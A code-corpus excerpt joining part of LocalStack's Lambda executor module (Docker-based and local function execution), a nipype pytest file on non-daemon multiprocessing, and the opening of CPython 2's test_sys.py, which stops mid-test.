# store log output - TODO get live logs from `process` above?
_store_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"' % lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
:param lambda_function: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(
self, cmd: str, lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = lambda_function.function(inv_context.function_version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
if not env_vars.get("AWS_ENDPOINT_URL"):
# Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
# can use it to ship patched Lambda runtimes that can interpret this config.
env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
localstack_hostname=main_endpoint, protocol="http"
)
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
"""
Run a multiprocessing job and spawn child processes.
"""
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
"""
This function writes the value 45 to the given filename.
"""
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, "w") as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp(".txt", "test_engine_")[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile,))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
"""
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
"""
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix="test_engine_")
os.chdir(temp_dir)
pipe = pe.Workflow(name="pipe")
f1 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f1",
)
f2 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f2",
)
pipe.connect([(f1, f2, [("sum_out", "insum")])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config["execution"]["stop_on_first_crash"] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={"n_procs": 2, "non_daemon": nondaemon_flag},
)
names = [".".join((node._hierarchy, node.name)) for node in execgraph.nodes()]
node = list(execgraph.nodes())[names.index("pipe.f2")]
result = node.get_output("sum_out")
os.chdir(cur_dir)
rmtree(temp_dir)
return result
@pytest.mark.skipif(sys.version_info >= (3, 8), reason="multiprocessing issues in Python 3.8")
def test_run_multiproc_nondaemon_false():
"""
This is the entry point for the test. Two times a pipe of several
multiprocessing jobs gets executed. First, without the nondaemon flag.
Second, with the nondaemon flag.
Since the processes of the pipe start child processes, the execution only
succeeds when the non_daemon flag is on.
"""
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
@pytest.mark.skipif(sys.version_info >= (3, 8), reason="multiprocessing issues in Python 3.8")
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
assert result == 180 # n_procs (2) * numberOfThreads (2) * 45 == 180
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
with test.test_support._check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
